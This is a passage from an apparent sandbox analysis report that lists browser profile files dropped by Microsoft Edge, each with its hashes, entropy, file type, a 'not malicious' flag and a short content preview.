                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                      Entropy (8bit):0.10279172244238667
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:Gu0noTo00noTJ89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+/4spEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                      MD5:2EE902828CBD7988FFBFD735260FEFBD
                                                                                                                                                                                                                                                      SHA1:27FF3D99A8616C3E6655196F6E11E5724E309883
                                                                                                                                                                                                                                                      SHA-256:A14EBA86365249008EBDE83A90F559BF738C15132A97F69AB5EE52EFE660906D
                                                                                                                                                                                                                                                      SHA-512:6E62F8535CA518A0C830432C0AD0831940E909CBA64C61EDD31AE24123F177872B53684299054676B59CA15239C9EDC74516747E5AC19A0E7B7FC1E3917F7018
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..-.............M.......O........^..6W..S./.u...-.............M.......O........^..6W..S./.u.........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                      Entropy (8bit):0.890272830280723
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:Qoed0uR0qcy3XHW3hvN4Il1Kfv8LyJyMAyOyNKy0xyi2:V5U
                                                                                                                                                                                                                                                      MD5:BC372FB4D2DF8FE275EEE6D20835A6C2
                                                                                                                                                                                                                                                      SHA1:49F2FF06FAF1647F037E5BA7FB8DFF44EDFBA99E
                                                                                                                                                                                                                                                      SHA-256:F58D86A5C812DAE187B0180361DD1393A4414D9241BB154A1D7C659308CFBAE6
                                                                                                                                                                                                                                                      SHA-512:368DF4E32477D104C42BB30B6D5E67ED0A74B20E6391D19B54D5BEEE7B0ADAD90CF2EB71399BE66B15DC7A4BB1EFE6F981F5F7C58CB8E21B0A724562E7A77A61
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:7....-............^..6W3...B!N...........^..6W..&#_.V.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):580
                                                                                                                                                                                                                                                      Entropy (8bit):3.7664904618593713
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:dlc8CdOuuuuuuuuuuuuuuuuLlljNjEPLlU8hU:ncslj1G+
                                                                                                                                                                                                                                                      MD5:91505C49F9EBE43035F7DD32DBD69DAA
                                                                                                                                                                                                                                                      SHA1:A79092AFD0480C6255E1A1202C30AC37F755E5A9
                                                                                                                                                                                                                                                      SHA-256:DD51846A042A0769A3BD0011FC78803C98D1C53D05015F41902E30044E171256
                                                                                                                                                                                                                                                      SHA-512:DF1706D05D969B4C0DBCB8086B118343DABE7F4C52699995C3C0C0C7664544805A28CB3092A89C7B1BF0E389762D733BCAB2923CAEA9129D19D67867510CB1C8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1x...0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................K..;...............#38_h.......6.Z..W.F.....\.......\............V.e..................5.0................39_config..........6.....n ...1
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.278083235568147
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1auX+q2PFi23oH+TcwtfrK+IFUt8YWi1augWZmw+YWi1ENVkwOFi23oH+Tcwf:2i1auX+vdZYeb23FUt87i1augW/+7i13
                                                                                                                                                                                                                                                      MD5:51F86FE0C1C31AD21DA403D96D3E0619
                                                                                                                                                                                                                                                      SHA1:D35C2322F9F028A75D7177016CF761FEA91B27E1
                                                                                                                                                                                                                                                      SHA-256:770EEC0168CBB576E5126F5B8C8D7ECE42B155926D048E253FB55FE93D19A14C
                                                                                                                                                                                                                                                      SHA-512:5C4781A552CC82E458B2A00A1F8ECE5ED935E3F27E99EE18E588367C85551508D29317FBB4BFC4C64FB86790AE1C531381BD3AE3A6771CF1A9918846CEBD1197
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.248 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/30-16:38:34.248 1f5c Recovering log #3.2024/11/30-16:38:34.249 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.278083235568147
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1auX+q2PFi23oH+TcwtfrK+IFUt8YWi1augWZmw+YWi1ENVkwOFi23oH+Tcwf:2i1auX+vdZYeb23FUt87i1augW/+7i13
                                                                                                                                                                                                                                                      MD5:51F86FE0C1C31AD21DA403D96D3E0619
                                                                                                                                                                                                                                                      SHA1:D35C2322F9F028A75D7177016CF761FEA91B27E1
                                                                                                                                                                                                                                                      SHA-256:770EEC0168CBB576E5126F5B8C8D7ECE42B155926D048E253FB55FE93D19A14C
                                                                                                                                                                                                                                                      SHA-512:5C4781A552CC82E458B2A00A1F8ECE5ED935E3F27E99EE18E588367C85551508D29317FBB4BFC4C64FB86790AE1C531381BD3AE3A6771CF1A9918846CEBD1197
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.248 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/30-16:38:34.248 1f5c Recovering log #3.2024/11/30-16:38:34.249 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):753
                                                                                                                                                                                                                                                      Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                      MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                      SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                      SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                      SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):5.2632823385426235
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi13zN+q2PFi23oH+TcwtfrzAdIFUt8YWi1WRSmWZmw+YWi1BiVkwOFi23oH+TC:2i1DN+vdZYeb9FUt87i1WxW/+7i1cV5R
                                                                                                                                                                                                                                                      MD5:627F47A091F6F3CD24160916F6B5634A
                                                                                                                                                                                                                                                      SHA1:C460156A15067C6FD63B70F1E40E95FD6D55EDEC
                                                                                                                                                                                                                                                      SHA-256:1F54665DA2BA5DCA4F6BFD36296B933C1B05D4B3D90DEFC34F839734A149AFD7
                                                                                                                                                                                                                                                      SHA-512:D96B7D9823286EE8B7CE9B8FC4BDDA34906146E1DCBC6CF0C6312358E0EE784A4BDC6EDB2F3D7B2F8AFB5BA2109CE62DFCA43A1959247427D7184C9C009275B6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.189 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/30-16:38:34.244 1f5c Recovering log #3.2024/11/30-16:38:34.245 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):5.2632823385426235
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi13zN+q2PFi23oH+TcwtfrzAdIFUt8YWi1WRSmWZmw+YWi1BiVkwOFi23oH+TC:2i1DN+vdZYeb9FUt87i1WxW/+7i1cV5R
                                                                                                                                                                                                                                                      MD5:627F47A091F6F3CD24160916F6B5634A
                                                                                                                                                                                                                                                      SHA1:C460156A15067C6FD63B70F1E40E95FD6D55EDEC
                                                                                                                                                                                                                                                      SHA-256:1F54665DA2BA5DCA4F6BFD36296B933C1B05D4B3D90DEFC34F839734A149AFD7
                                                                                                                                                                                                                                                      SHA-512:D96B7D9823286EE8B7CE9B8FC4BDDA34906146E1DCBC6CF0C6312358E0EE784A4BDC6EDB2F3D7B2F8AFB5BA2109CE62DFCA43A1959247427D7184C9C009275B6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.189 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/30-16:38:34.244 1f5c Recovering log #3.2024/11/30-16:38:34.245 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:117.0.2045.47
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
